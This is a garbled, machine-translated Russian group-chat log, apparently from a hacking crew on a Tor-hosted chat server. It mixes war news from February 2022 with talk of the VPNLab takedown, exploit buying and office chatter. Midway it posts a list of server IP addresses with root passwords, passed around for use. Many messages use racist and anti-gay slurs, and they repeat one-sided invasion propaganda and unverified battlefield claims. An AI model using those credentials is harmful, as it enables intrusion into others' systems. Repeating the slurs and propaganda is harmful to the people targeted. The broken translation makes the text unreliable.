Well, seriously, or did someone just have a lost satellite connection on the contour maps? Did they fuck up or get lost? They are kind of defending the Donbas, so what are ours doing there? The Ukrainian media confirm that the Antonov airfield in Gostomel near Kiev has been seized. They also report that ten IL-76 planes with Pskov paratroopers are flying there. Russia appears to be building up its grouping surrounding Kiev. The Ukrainian media confirm that the Antonov airport in Gostomel remains under the control of our military, despite attempts by the Ukrainian Armed Forces to dislodge them from there. At the same time, local newspapers report that ten IL-76 planes with Pskov paratroopers flew to the same airport. If the storming of Kiev does not begin tonight, ten IL-76 planes, each carrying 225 paratroopers, can make such flights 3-4 times. It is not difficult to calculate that by morning there could be a 10-thousand-strong group of Russian troops within 15 km of the Ukrainian capital, which the AFU will have nothing to counter. Question to connoisseurs: "Just burn already, let me think of another riddle... Finally, what else to do... now you know the secret...) ah, that question was bothering me for a long time, if anything.. it seems. even a different frame highlighting is a kind of code, and syntax is highlighted by a link; it must be that you use one quotation mark and I use three. about the link, that eh. The best. But not blue [ ] (https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=PsRFwTXXBLPDJk5qJ) too. i specially took your link, locomotive) you first, i'm blue. stand blue. explain to everyone, in `https:// ` the letter S is blue? what i threw down i see all in black font, thomas `S` is blue the first) `https://www.youtube.com/watch?v=N_xQUwdkAOg` is right! (s) ptz la konya plesnuda. faggots, they are all emotion guys.
emotion:smile:not faggots in the sense with toras they are second row i got against toras[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=PfdMwi6ffLypPJp2k) well of course i'm against fags, you can not trust anybody woke up) one message can put a bunch of reactionsahaha hilariously you Weldon, I can not promise you, I will try, Steam Train on asvat write pol not tweet the main thing:copyright: how the fuck do i tweet?I have not reached Chernobyl yet-maybe from Chernobyl you still have artifacts, it's safer ... plutonium is unstable, plutonium is not stable, and the main thing is not to tweet ... How the heck do you use plutonium?plutonium is unstable, just asshole, so be careful there, if anythingHomer shared, all sorts of things, I'm better at plutonium@weldon work I can't remember a lecture by someone who has a direct relation to itwe have alcoholic beverages and they kill the body because of the second components you tell me when I see diamond heels:laughing:there the degree of purification and will be fucking great) so you just need to run it a couple of times try it I remember there is alcohol what's his Bryntsalova there is the Ministry of Defense I do not mean those and normal there are just different alcohols it can be technical and normal I do not know, the last time I took the Old Man 7 on New Year's Day, I would not say that the spirit how could be dirty?chemically dyed it just make it for the drudgesam alcohol dirty as trash water datakih TU sorry sorry home distill moonshine that no old man that no now all the lousy alcohol in the shopsstareyshina normal comrade) vodka do not drink exactly, cognac ordinary -ElderA))) or Elder, I do not understand the question of vigilance decide too, what if you also need airing, especially with your elder as a guest today@Garfield I drink cognac) Well, hz, vigilance vigilance. What's the difference? Like a wedge with a wedge? 
One vigil with another?well, the results of vigil you can weather periodically - a tiphack for you)) all the room is always awake in the chat, i believed in you guys, always on guard)) and brother there is something to help)) he went to ameruka, at a conference on iT technology, or you yourself lately here?))who is it? cuberbike overdid vodka?:laughing:do you need it? fuck the dollar 89 so those who are against us can not cope without usCNN broadcasts - Kiev airport taken without a fightV.tsoi - cool song what's up uraniumheads? Klitschko did not give birth to anything?)Cocks played):Thumbsup:Russian troops marched to the Dnieper, landed in Odessa and moved to the Kiev region Chronicle of Ukraine's demilitarization operation, 24.02.2022, DAY (updated) Russian troops have advanced 50-70 km deep into Ukraine in some directions and are occupying facilities Russian tanks in Nova Kakhovka A Russian flag is hoisted over the Kakhovka hydroelectric plant. It is reported that the Russian military are complacent, allowing them to take pictures, smiling. It is also reported that Russian motorized infantry has been spotted in Antonovka, which is three kilometers from Kherson on the right bank of the Dnieper, that is, it is already on the other bank. And a little later came a report of a Russian flag over Kherson. Russian landing from helicopters in the Kherson region I would also remind you that Russian troops were found deep in the territory of Ukraine in the Chernigov region, In the vicinity of Kharkov and on the ring road of this city. The State Border Service of Ukraine reports the presence of Russian equipment in the Kiev region... SBU burns documents in the center of Kiev. Two Russian fighter jets flew over Vishneve and Zhulyany (western part of Kiev). A mass of Russian helicopters over Gostomel, 5 km northwest of Kiev The Black Sea port of Odessa under the control of Russian marines. 
An APC of the AFU and a Russian Tiger burned on the road near Kharkiv There was a strong explosion in Kiev. It was heard in different districts of the capital. As the adviser of the Minister of Internal Affairs Gerashchenko specifies, it was a rocket attack by the Russian Armed Forces on military facilities in Brovary. Sources close to the Office of the President of Ukraine say that all launching positions of the Tochka-U operational-tactical missiles possessed by the AFU were destroyed, as well as all long-range missiles and air defense. All the coordinates were known to Russia. The Ukrainian side is claiming the 7th (!) shooting down of a Russian plane, while all the "evidence" for the last six turned out to be rotten fakes of 1993 and 2011. British Prime Minister Boris Johnson called an emergency NATO summit. Lukashenko said he had received assurances from Putin that he would treat an attack on Belarus as a Russian attack. The Border Committee of Belarus said that all Ukrainian checkpoints on the border with Ukraine were closed indefinitely. The Belarusian Defense Ministry reported that it was decided to close part of the airspace for civil aircraft starting from 11:00 a.m. Kiev time on February 24. Zelenski submitted to the Rada a bill on general mobilization. For those who have not had time to leave Ukraine - this is not good. Moment of arrival of a Russian Air Force Kalibr missile at a military depot in an industrial zone in Odessa Air combat over Kiev `https://chervonec-001.livejournal.com/3977120.html` As I wrote - it's the last day of the neo-Nazi junta. Do you want it??? take it away I told you - carefully, there is also about Alaska we sold it to the leasehusl we did not attack AlaskaThe question is different we started to restore the imbalance `https://www.youtube.com/watch?v=NlcF5QBhTiI` listen carefully, this is the end of the pindostanet of course, i told you right away = 2 missiles 1. on landon 2. on fascington the u.s.justifies our fucking? 
and what does serbia have to do with it? no way are you thinking with your other head?) now! I only think of my family.Boryspil and Brovary have been stormed.or don't you want to remember? @angelo when we "regretted" that schizo clinton bombed serbia with uranium bombs, don't you remember? yes kera, I am fucked up, deep down I regret what is happening.Air alert sirens again in Kiev.Russian strikes disabled 74 ground facilities of the AFU military infrastructure, including 11 Air Force airfields - Russian Defense Ministry What did you give him? I think this is the first day when Angelo is really fucked up and is not jokingAnd he is waiting for it, it will be 5 years old, he will be standing (like Angelo's) I still have a piano from my grandfather at the cottage! @weldon you can make good money in rubles, people make good money by operating with news and in BTC, maybe you can keep your savings in Western companies, in foreign currency but you have the global economy in front of you. They'll fuck up the devaluation and the paper will be garbage. I have a colleague from there I had a partner in the ua, now I don't know what's wrong with him, and how we'll work and whether we'll work or not. Then there are no questions. Although you're not from sngkhule, what good are interviews and everything else if the results of your work are multiplied by 0. There's no savings and your finances depend on one man's shiz, you our salary depends on these events. I don't care who's fighting who. I don't even bother myself with it, I solve more pressing problems for myself - I go to interviews, do tests. I think this is more productive than scrolling through news sites all day, reading who won and overthrew whom. The whole country is now hooked on smartphones, every 5 minutes going to news sites for another dose of dopamine. It would be fine if they just looked at the news, but under each news item there is a bunch of dirt about "the Kholokhlov, the Vatniks, the Moskals. 
I remember leaving a comment there once calling for peace, but both "khoklys" and "muscals" pooed all over it. Peace to the people of Ukraine, peace to the people of Russia, let all this bacchanalia end as soon as possible.oho440 servicemen of the Ukrainian Armed Forces requested a humanitarian corridor and crossed into the Rostov region.FSS RF reports that Ukrainian border guards have left all units at the Russian-Ukrainian border.agentura what documents?the SB on prorezna in kiev is burning documents in the courtyard lnr was attacked at night. don't read it better because of what all the news didn't read, but seriously want a trial over the junta. what do ours want? ours is already in gostomel, near kievomon for these purposes move the chat to ridonly. I do not have enough of this political faggot to go to turkey with a ruler) everything is clear, Zele is a gastuk, we need a 5-star horse)) I am a common worker, no demands, who are you to demand something from me?Questions above and not for Zelu, answer for yourself. Zelu will hide, it's his last day, ours is already in the suburbs of Kiev. money is bullshit in this matter. any such movement should be confirmed by deeds. and now you are just another spectator and instigator.So tell me about those people. the propaganda is here... sarcasm lol) loshugu did not serve, but at least ours served in the army. they are respectable people. in any case, we should not blame them for their normal professions.I'll remember, son, yesterday it was a sin not to drink, I'm trying not to sleep, enough bullshit... what the fuck is going on here? I don't even know what to discuss now... what's all the fuss about? 0 without 1 you trying to manage me, there is no such thing, if you want something, do it yourself what the fuck? when the cocksucker is shown) from the court website we need off-the-record documents. It's fucking bullshit. It's rbc`https://www.rbc.ru/rbcfreenews/607dc6509a7947debfa01601`. 
it's still under investigation, there's no court order. i don't know, i haven't read it. don't open it, my knock@kermit do it yourself, I follow the movement of troops to Kyiv if you read it, I may find the wrong thing, I need exactly what you read it begins@kermit search yourself, a fucking court in which 99.5% of sentences are guilty, was there a trial?Are you threatening or welcoming, an independent expert confirmed the injection marks on the body and finger nails ripped out, the whole groin was burnt. what dags? there was one dag and a cleaver as a witness. i want links to the case. have you seen the pictures of the body? bring evidence, we will think like naive girls and we think china is our friend russia and Ukraine should be with europe, not china `https://www.youtube.com/watch?v=T3pYbzFrnQU` me too did china fully support russia at the united nations? The result is enmity and hunger on both sides. The plan was a success. All the testimonies in the cases were beaten out under torture. They don't count. Victory, but WITHOUT THE DEAD for which he was detained, or which were later opened. Welldon, did you fuck up there in the morning for victory, and what exactly is he doing? so send me the fucking link to this propaganda, we don't watch TV@kermit read the case file, it's published @all turn on Rossiya 24, there is a video of Ukrainian troops surrendering divisions he is a saint. He was not tortured in prison, so he is innocent of the Kadyrov trial to call him guilty? By the way, kharkov murdered a prostitute, a dag and a tajik in the woods, who was put in jail for proven murders No.)) I apologize in advance, do not talk about the Russian hero! Allah sees! Be quiet! Were there any witnesses? Patrick, why is our bearded friend at large?) Witnesses were tortured too? 
tesak was the last russian neo-Nazi who went to prison for proven murders aha and Furgal is our main murderer when they put electrodes on his balls - you confess to everything - confessions are obtained under torture - I repeat, tesak is a murderer, i repeat, tesak is a murderer, it will outweigh all his good deeds you can come to me - there are cryochambers, for santa clowns not only with pedophiles) tesak fought with pedophiles, 16-year-olds in general %) ok, tesak is not worth the example of five) tesak is a murderer tesak fought - jailed and tortured....solve problems, create a party, fight for 10 years and win, you will take care of the kids as you see fit...solve the fucking issues bitch, they're all there and no one gives a fuck about the kids! it's the bad guys who fucked up 5 out of 6 drugs prescribedPatrick!there are problems everywhere, but there is a difference between nationalism and nazism and you know about 228, how young people go away for 10 years and they do not give a fuck about it from above@angelo, you do not understand, this is different)))))The Chelyabinsk region has some remains of nuclear reactorut a problem, especially SEIC))) fuck, you know everything yourself precisely, why the fuck should I prove anything, no one gives a fuck in Chelyabinsk people die from cancer like flies Where is this?Fucking hell, there are so many problems here that they brainwash the kids with fables about the Holodomoraga. They're all in jail, and Khakhlova is the one who martyred people and raped children. There's the Tsapokov gang, You live in Ukraine, as far as I understand, you can go so deep that it turns out that there are phishers here too, and not just a few ministers, gubberpidors will remain faggots, play the piano, when will our scum answer who is killing people in Russia?When will ours respond, Patrick? The neo-Nazi junta will be liquidated and put on trial, civilians will not suffer, only people will die and Kiev will be ours by nightfall. 
What good will it do, except to increase the prestige of the grandfather and an additional reason for the vatniks to puff on the Tsar? And Tolkuputin will answer all questions today, hopefully by tonight Kiev will be ours@kermit your Russophobia and anti-Sovietism I know, I will not treat I will not even write, why the fuck not Golikov hanged then?No one is happy about the war, brothers, but this neo-Nazi gang of Canaris fodders should have been sent to court long ago, you're wrong, there are no questions about North Korea nowVon, missiles periodically fly into Russian territorial waters from North Korea. But no one seems to give a damn. And they have nuclear weapons, by the way. But no one got excited@patrick, so they did and did. No one will ever use it anyway. So, just to frighten people into using nuclear weapons, the war was inevitable, Ukraine made a bid for nuclear weapons I would explain, but I will not do it Are there any real Indians? Can you explain what's good about it? I never understood and still don't understand people who rejoice in war. Especially when your country is involved in this war, if you did not live in the most beautiful country in the world, you do not understand you sovoks. you did not live and now you have poisoned the lives of future generations. lol I will not cure your eyesight, sorry, he who does not want to see, will not see. you just didn't believe what i said about postolympids, now just turn on tiviset60 gpicoins Don't take that shit@patrick, what's the good in all this? Kopecks.elizabeth allOmir fucked upNow, the chinese ships have sailed to taiwan :D and it will be a right move for the general noise, I would do so taipei and can fuck china what?:grin:1 wood - 1 dollar) stupid and dumbest stupid, but I'll teach you 2 zeros and always 100 rubles per dollar, so the transfer will be easy soon crypto ruble!the market will be going down the drain, but we'll be able to buy stocks soon... 
The MOEX index is -28.8% :smiley: @biggie don't need to go past sartiranado drink viagra, then nothing will fall at all i can't even buy Dobry Juice now - it's americanskii nato nado accession, then the euro will replace the ruble and nothing will fall at all xx, and if it's american? buy zhigelvskoye) fuck, go buy a Zhiguli) and makbuxazin up the ass with iPhones as the iPhone put the GDP on the dollar while the dollar is 85 so it is so I understand that now the latest model of iPhone and mabuka are those that you have now and everything The black digger found a WWII-era land mine in the field and personally reported it to comrade Stalin aday a little humor to lighten up: don't worry - your house will be even better babanubara all over ukraine fly))) djblo do not need bases, do not need roads all airbases are liquidated babat compote, i have already defrosted djavols) start preparing sukhariketa -polest-drive all pvo liquidated keta went @kermit and i told you - wait until the Olympics end and you will see the end of banderites fuck it up, full fuckin' kuev, ta kuev, fix the bug, royal pokemon) well you're a lucky guy `shake my hand` when i caught the disconnect, although i had a disconnect recently, but it's normal, it's alive ? no, back up coolpik up? that's the mysterious Anglo-Saxon soul...??????
i got confused with pickup))) which literally means "back up" Ж) back up is also an option, copy what you need and format them back up, format and unpack tovarichi, suggest a program (with a cheeky deletion algorithm), that can quickly delete experimental/trash data from SSD/NVMe - 195 GB (209,902,159,158 bytes) this is - 17 million files in 1.4 million folders/subfolders), the wind will take me 24 hours to delete them) is Connect pong ping thanks root 89.41.182.28 Lc4z6sUzR2F18id9VN RO root 5.181.156.69 eiW? aich4uub MD root 94.140.114.15 WTk3E0YnOGgum8U LV root 45.89.106.67 34fhjdgEN3rE5ff USA root 194.135.33.241 34fhjdgEN3rE5ff USA root 5.181.80.106 34fhjdgEN3rE5ff USA root 185.99.133.120 (mimjJR004@A8J New Zealand root 142.11.209.57 JH33UZ9k9QKZm7e9n USA pok only 8pcs ready so far, will be ready soon! throw in 12 vpc, please Hi kermit avatar put it up) I'm just a jolly vet tomas no sport is not only in the TV there da sport is for the bums and I do not have a TV I do not only watch soccer tv in general I do not watch sports not I do not watch soccer, You probably also like Locomotive. We'll sing it every morning and I suggest making it an anthem://www.
There's Mikey bought Blizzard for 70 billion! monsieur knows a thing or two about perversion)))) > fuck and eat - perfect coincidence for the evening ) And only 3 days late on the payroll... i'm afraid to imagine a longer timeframe a then... smoked on gutaline smoked dumplings) :new_moon_with_face: extra.option - a black sauna, there's also charcoal for roasting then dogs) but the meat needs to cook longer, it's tough :thumbsup: fuck and eat - a perfect coincidence for the evening ) let's switch to black: whores should have dinner :grinning: the words "tight" and "whores" in one context Small thinking. We should go to the whores for dinner. Ratatouille them make a stew of pigeons, maybe the whores will not be distinguished from the chicken ... Thanks for at least reporting..... no news, waiting :joy: You need to run from the room in which you were placed. accountants after drinking bitter will want a sweet and arrange bdsm :rolling_eyes: It is not uncommon, when you go to the accounts, and there ~ accountants ~ great people, vodka ~ eat ~ drink in Accounting May be better all together in the accounting department, what is the news? Better in the morning, eh? @frances Master Race - Pulling On The Boots https://www.youtube.com/watch?v=y_vyEt4AcdQ "Geez, I was just about to drop a cool track ((oops, enough of the youtubes)". https://www.youtube.com/watch?v=T69exrSNyMU I understand, Cat, I'm an extravagant person, I know, no offense, I'm nice WHITE POWER ! Let's listen to the white wolves and the atmosphere is off the scale)) Listen, are not your ancestors from Venus? How do you like the name of the band? Von I come up with this, are you a latent nigger?
I didn't throw the link if anything) but I like a good person, bro, I was born in the USSR, to me any African-American is a nigger, what shades are there I don't know) You started the topic of racism with your link, or it was sarcasm, or you saw something in my message before that's not where we went, my fellow Aty-Nazis:D I remember the Chechens in a country in the EU were trying to shoot me and wanted to stop me, it's amazing) in Paris at night you can easily get beaten up on both sides of the countrywhy, I had conflicts with Negroes, they have their own problems with us and the smaller minorities,whose ancestors were serfs and rubbish for the nigger stranglehold in the south if you've ever heard of a man from Dagestan in Moscow I agree with you, you're not inadequate then just usually had run-ins with other niggers I'm just an example what's a nigger got to do with it?and what's the reason to beat the fuck up? the term for jurisdiction, most likely, and for the nigger ego) everyone is equal and everyone has the right to be free to act as long as they do not disturb others but if a nigger comes up to my kid and says he's the best, I will break his jaw and arm so when he pees, he will remember about equality or not? I am a very tolerant person you out of context so you in rf would not understand itThe schools, already actively talking about freedom of gender choice. I don't give a fuck what people do. Who fucks who, who's a boy or a girl, who likes to eat shit or do heroin. 
But not when there's an attack on the freedom of children's rights I can't believe it's all so chaotic, blacks, LGBT, it's not a question of who's right, but what's the point of this bullshit and their ancestors are from Africa, etc. Well it's true they are African-American they always need something but obviously not on a level playing field This is one side of the bullshit here is a little different, concerning the blacks who decided that they are African-American and just stuffed their various laws and codes with this racist bullshit. just came and humiliated all the snowballs more than once))))) and everything we do we are also responsible for together as in the 90s wild capitalism today a bullet in the forehead to a competitor and tomorrow pray to god or a christian whether you are a nigger or a muslim is convenient Kot, everyone lives by the principle "when it suits him" plus+ esttest True Nigga Lifehack _)) i think that blacks only consider calling a "nigga" racist when he benefits from it. nigga_negga https://www.youtube.com/watch?v=N1qCKOInezY "Ahaha clearly! It would be strange if their report looked like this: "We broke the VPNlab service and shut down their domain, the server room was stormed and found two illegal Ukrainians, a Pole, probably Kim Jong-un's grandnephew and a Negro. The negro was found only when the sun came up." ...Russian is not my mother tongue... you fucked up the comma when you just started touching yourself with your hands and thinking what it was, I was special... something like an emergency response office or something called that. @angelo be an emergency erection specialist? :grin: fuckin' fakie Europol said it seized 15 servers operated by the VPNLab team in Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the US, and the UK. "Some kind of emergency response office or something called that."
https://therecord.media/europol-takes-down-vpnlab-a-service-used-by-ransomware-gangs/ like fighting cybercrime they can do everything in 1-2 hours but the servers aren't just domains and the word dick is written like a fence are limitless there's no way to beat the math. most likely, they didn't just take the domain and forget about it. the possibilities of such structures that set up a breach are limitless. i don't consider the FAQ a guarantee, and i like questions. i asked you questions. why are you trying to pull my finger up a man's anus? You can go deeper, was it about massaging the prostate? Have you had experience or did you ask for a massage? That's good, because it usually hurts pessimists Kermit, do you still have prostate pain? You'll defend yourself on Tarkovsky, but I memorized it like a mantra zaponi, it will come in handy in court. People are criminal by nature, but they're weak. And only the strong, the chosen are capable of evil. Evil is a stepping stone. If you cross it, you're free. - And good? - And good... It's such a simple trap... for fools. - It's a shortcut to civil war. - And it hasn't ended since the creation of the world. - I like the dialogue in Tarkovsky's movie about good and evil. How do they fight spam without logs? and then fuck it and logi blah, this cartoon about logs is written everywhere aha, robin if you believe their FAQ, the lack of logs - the basis of their service was to show the examples I can and deeper, but zp no how deep everything in this world is relative good and bad if only in quotation marks canonical vpnologii were still included kermit, about work - yes, I agree. this struggle between "bad and good" is a constant for all time oats for kitties Mozhewelnik And the grass in the bucket just grows like a kitty can you imagine?! You're sitting on a rainbow, you have a bucket of grass, a mini factory with whiskey and girls You have no balls)) Alla, I'm going to the bar!
I told you about paradise with guria a long time ago, we have a mujahedeen among us) Can you imagine?! You're sitting on a rainbow, you've got a bucket of weed, a mini brewery with whiskey and a bucket of girls and you can go to the rainbow, don't they give a fuck about the rainbow? dusha or dushee that's where the question is, we're in the soul kitties so if he's your kittie, then you should at least sometimes make a show of what bombshell. work guys Ruben Yakovlevich, we do not disrespect or insult our fellow man in any way ! while the flatulence, i think i've calmed down a little bit, now Garfield is going to be insulted, aren't you a pussycat? they don't give a fuck, they'd rather lick my balls. i'm being castrated and factored in. they say europol, the state department and other cops have defeated who's bombing? the whole globe it's their fart so bombytstryam sharpdefeyspeech cool yesterday from 15-16 hours fucked up a lot, when I decided to check why does not work, went to the lk - and there I TOOOOOOOOOOOOOOOOOOOOOOOO... kermit, what is it? yes yes https://vpnlab.net/ kermit, i got a hunch @hammer @elroy when you're ready, let me know. > Vaughn angelo got the trick. > oooh, i feel like i'm about to post some more dicks, i love it. Nononado! You stop it with your jokes Hammer! I'll take my wife's card away... to keep the money, you can't give it to anyone on that day... tomorrow it's Epiphany! You don't need to fuck around with it... fuckers, that bread for the sake of front and behind ♪ they give us ♪ and behind us, God forgive them! And those whores... Lying ♪ They're the ones who suck ♪ not giving ♪ those sluts... Fucking, Fucking bitches!)) That's what I tell them ) with my brush hhm, pay for sex - GENIALLY clean their teeth at home let them eat) you have to pay off whores with your dick, not with food I pay off whores with food, but not for long... All ...
I'll keep quiet ))))) and stop writing me about it, I'm too suspicious)))) For those who are nervous and worried and watch the news - everything is according to plan, there is nothing to fuss about, panic aside What is the news, you're a whistle dove! I've got news for you. Hello, everybody. The pay is a little late. Evening or tomorrow, most likely, he'll write! https://www.youtube.com/watch?v=EqLLL2HErxA `test` test like a fuckin' test in Novigrad will stink like a shithole fugas :D Gomer, and even cool shit in a bottle and there corsair bigger Da we know this scheme Alf (you never understood))) Bitok falls down. While he falls, the franc will not. but will begin to grow - he will immediately come himself)))) I love it! You should put firecrackers in the poop... I usually poke the poop with a stick... I'm choking on coffee, and he's drinking cognac... One of the world leaders in buying 0-day exploits, US company Zerodium is interested in acquiring 0-day vulnerabilities for VPN on Windows, namely ExpressVPN, NordVPN, Surfshark. Exploit types: information disclosure, IP address leakage, or remote code execution o not that here https://dump.video/i/NuqCpuCt.mp4 there's https://idiod.video/wunqh9.mp4 dunno, in the west, maybe there are some places already I'll never forget the guy who rode his bike and had a big rubber dick instead of a seat. There is no such a thing?) it's because he does not have a bike Zloy )) pi... once! once time once + @all now disappear rocket, I switched to a new version of Tor, n apara min will disappear now I laughed through tears =) Come on, what are you guys! Just started working!!! > Porn to discuss with them and normal. And this is the image in society, to the point that "you do not want to tell us your page, you're a criminal, what? Are you hiding?", in the management company asking for "Whatsapp" to throw out documents ... Porn to discuss with them and it is normal.
Accounts in social networks should be maintained, to feed them with some style ... It seemed crazy before, now if a person has no page, you get suspicions. The "art of war" by Sun Tzu ya do as you like and keep to yourself that you like so no one knows for sure you like it so you don't know when and what they will say against you a very simple strategy - the more information you give about yourself, the more harm you do, don't like it so control the likes in facebook. On the contrary, you have to be optimistic to believe that before the internet was not controlled by anyone) There's just a redistribution of influence going on) otgotgotgotgotgotrebootedotrblack((yikes, slack, otrotrman, the case yes tut otr .youtube.com/watch?v=LKo0D8Ot4hY&t=6s :partying_face: @angelo do not worry, I play black... `https://ok.ru/video/1035121332533` as quailed) cyber fighters, all happy Defender's
Day! :sunglasses: :beers: but cool toy/shooter, especially under 5 years old kochari) the music from the terminator is awesome!!! NO FATE gentlemen, NO FATE... oh man, i thought i almost passed *Terminator resistance*, but the Poles have *Fatal Error* :grin: i got tears in my eyes when i wrote it - *ostrAt* - russian learn, by C++ Bols, sadness, sadness Yesterday there was so much ♪ And today it's a pity ♪ And there could be no other epilogue. And yet we've written our names on a tablet Let's get some rest, not much at all. We'll clean up where the dirt's been And we, the children of vice A great destiny awaits! The grin, the keenness of mind and experience. Hunger, anger, and a fire in the soul Our strength - you will be drowned What about the Ukrainians? They are yesterday's brothers Slavs, a truckload of greasy 200-year-old bandera fighters... Write to the police... I would bring Crimea for a good slice of salamo... I will go to the bandera fighters - *you bastards will answer for Odessa* :sunglasses: :smile: It's time for you to lose weight) you eat a lot, it means you're fat? i'm not you anderstendlouveldanea?) you're getting fat today, uncle 200k ??? i'll take it all!!! :laughing: Considering the exchange rate, it's possible to fuck up the price of a lakh. There's no competitors, there's no market. Why the fuck should they get cheaper? It's a fucked-up price for a 200k notebook. It's not a market. They sell it with elbrus, they're now putting them on state orders and there's no reason to develop their own market. there's no market for them in principle, they're trying to just scale it up. i don't argue. they're just working next to the Elbrus factory and i saw them, it's a shame. only i put up an ava. and fucktroll?
@thomas don't feed the green guy, i hope @weldon is a good troll, and he's just a fatty in general it's very expensive and there is no x86 and 64 support, there is a bridge that translates designs from theirs to those just crap these prods are so expensive, because there is no mass production. They are so expensive because they are not mass produced, but the PENDO sanctions are just an excuse to upgrade our PCs). I have read about Elbrus more than 20 years agoBaikal is very cheap, as far as I have read for the masses may be BaikalIt is also a question of the fact that MCST has no resources for mass production. So it will mainly be in state-owned companies and some corporations.> It would be funny if it were not sad, soon we will sit on the elbrus At least it will be without any of the potholes and holes that x86 has. But the hardware compatibility with x86 there is original, in a bad way, but the average user should not care. then we will outrun bodybuilders when I did (20-30 min approximately) - approximately so and pumped) in Russia most likely will not enter, a priori will be like Abrasion and South.By the way, I understand that the L/DNR will also expand. I remember that they said that Putin likes pretty dates. 
Nice note about the date, but I did not notice it at once as long as it is not on the bottle) `https://3dnews.ru/1055545/brakovannim-protsessoram-elbrus-nashlos-kommercheskoe-primenenie ` or hang it on the fridge, as in the article wrotenopros - at least one room in winter can still be heated on the 8 and Elbrusa)) cheap and sorditonu that 8 Elbrus took my rizn 9) cheaper, @ weldon available for them) you forgot, we have in the blood to finish file file)Just wanted to write about the price of Elbrus - I decided to type in Google to update the information - the first link: "In Russia they began selling defective processors Elbrus" only 2500 rubles "I think they will quickly get cheaper, well we will have to pump it upa will not throw would be funny if not sad, soon we will sit on ElbrusVovan likes nice dates::sunglasses 08.08.08 - for Sukashvilli/Galstukoyed 22.02.2022 - for the clown who thinks he is a joker, he is preparing a necktie and waiting for an order from Fascinkton... thinking in the meantime... eat it for breakfast, like Sukashvili, or hang himself with it:laughing:what about the Khokhals? I don't know, but there is a web-version, and it can be easily checked, i.e., if it reaches mzhVatel.ru or if the service is dead? Does it reach mcg Hey all, I'll write to all @all guys, and who uses the jabber 404.city? Is there a connection or is it dead? Maybe it will work fine I have a stutter I do not quack, and quacks.... Strange!!! At me - yes. Toad quack? Waiting ... zp did not fly?) Good morning all! Hooray comrades! 
hello to allWe all have a comfortable work and productive week, let's make it happen!!!Let the workday beginGood morning.good morning morning @kermit write them all in and out of the gate in tension about Voronezh "African children" is just a warm-up.... it's a test run ... where the fuck are they going to get it from? Gates is poisoning African kids with vaccines. Microsoft is a Russophobic company... let's impose sanctions against Western technology... let's hit Voronezh. Any other options? or fuck the ua and stay with baikals and bolgenos... now our hackers will change the earth's orbit... panic a bit too soon... this is itdetails are needed in the themes win preview so this insider-link I can not, and the assembly - insider preview build 22557 this is the users who have decided to try win11? this bullshit periodically offers when upgrading lincatac new build came out, now require an account, either home or pro... on reddit snot brook brat live on the pro version for the pro version account is not needed not far off the day of auto update 10 in 11 and hey give accountnetread the news ... you need an internet connection and an account to install win11 angerfist- stainless steel ``who wanted some music? ``` zardonic - bring back the glory ``Here it is, they're reading the ads here, put them on avito.`` Well, that's all. 
30 - that's 20 screensThere are also only for reading) a total of 600 eventswill seeSee to unload at least in tchtSelect the log and event codeTo do this, you need to create a selection of filtersThere can apply a filter to the event code or eventseach event there separatelyopen logs, there look only through the SE ?come back to the question, how to display all detects in the list in Windows ? i have no @#announcements only for ads addressed to all@mitzi true@hammer here messages will fly away in a couple of hours and there will hang waiting for a response and looking for a woman, 177 brunette no older than 20 years (the first free ads) @hammer the first 5 pcs - free) here are 30 detektov and need to copy all files by the list by the way, @demetrius , that's right, who needs, he will give a piece of paper with a question and you'll announce, although it's possible so it is a list here too)) guys, how to look through all the detekts that were?no thanks everything, there will be no second GeneraleSince the creation of rocketon it did not end "well it's starting..."`look for pictures of dicks "now there is an important info ))))))) just write something important thereafterafterafter you can show pussy, but there all on serious stuff#announcements#announcementsmust have seen it Dim, you just did not, a long time ago:D so you would say right away now, not a year has passed !tx come#announcementshammer, YES, ridonly+there is a dough, and now there aredemetrius in my #announcements blank and the answer, was not, but appeared, after the post!so far what are #announcements read-only? 
@demetrius , and make a test post there for @alleymanyone does not go there by defaultonly there are 140 people, and here 160 he open channel@all who is not in "announcements" - write meSee what Thomas suggested and share your impressions.so keep scrolling.Right.-https://www.youtube.com/watch?v=0Vi-4CvAvWQ the song with no lyrics i can't see.i posted it above.suggest it!- come on!@angelo get together,we'll sing another one.- no.not sing me a song about love.let's hear it together!should i talk to the cat?- come on.who has what song on their mind? -https://www.youtube.com/watch?v=0Vi-4CvAvWQ i've been sitting at the company for 16 hours,i swear!- come on.I've got some time to piss on this. Why are you writing this? It's my favourite song. Why are we so grumpy? Friends, I love you all. Let's sing a song. Why not write important information there? We've got one channel, announcements, important alerts, sort out the chats in a human way.I've already fucked up my conversation with my bosses. I had a question about proxmox, someone would have answered it better... It's a public channel, there's no important information here, just shut him down. I do not know how others, I'm critical communication, otherwise the melancholy in the soulLook for an answer, like a summer nightingaleI do not believe it when they say so, usually do not call backObviously.We will definitely call you backYour answers are important to us.Thanks.Yep.unsubscribes and back into the swamp I start anything and run here I can shit and eat, listening to a book I even rocketed out)) As what, work of course, but instead of watching the first channel and let's get married during the breaks, we prefer to communicate with close in spirit brothers and sisters look - I usually can not do one thing (if it does not need concentration))) And now?And now?) Seriously? 
I envy youThat I have such an opportunity, alas, no. Friends, I love you all as family, but explain to me, please, what are you so busy that you have time to bullshit? I understand. I'm waiting. I don't mind, Husim, I don't know about the others. Guys, can I ask you a general question for everyone? guys who use proxmox for tests, does it work for you? and hushima? the magic word hushima, i call it - a healthy indifference in the middle can be added -fucking- surprise - denial - acceptance. - acceptance there are 5 stages or it's the first and then the last one) it's already in the way the accusation is omitted, for example - fuck bitch, after - so fuck, where is the last one? and fuck my biography is the same for everybody? stages of acceptance: - fuck yeah. - so fuck. - all right, fuck.@ned write great news) pull is workingIf the git does not work, piss on adam, ask him to issue a project that you need git Hooray!) shit, not even a single pahabian anecdote can not remember when there is no one to communicate no more than that What do you do?) why relax you tossers the most boring friday!the task is given, they will do it. who got the axe in the end? and the new server with each drink more and more begins to like)))))` said Dima pouring himself a 7th drink `there! fuck yourselves! the pressure is shaking, and then all slow down everyone has a headache? ))) yes it seems normal rchat today not always, but it happens) friday trot = dumb) like the old grandfather's zaporka like all love rocketrocket wants to kill my nerves I have a rocket dumb, but not troitqtokh collected or try?i don't know if it's the rocket's trotting or just my luck? i deleted the messagene that chat, i messed up what's this? why, i just 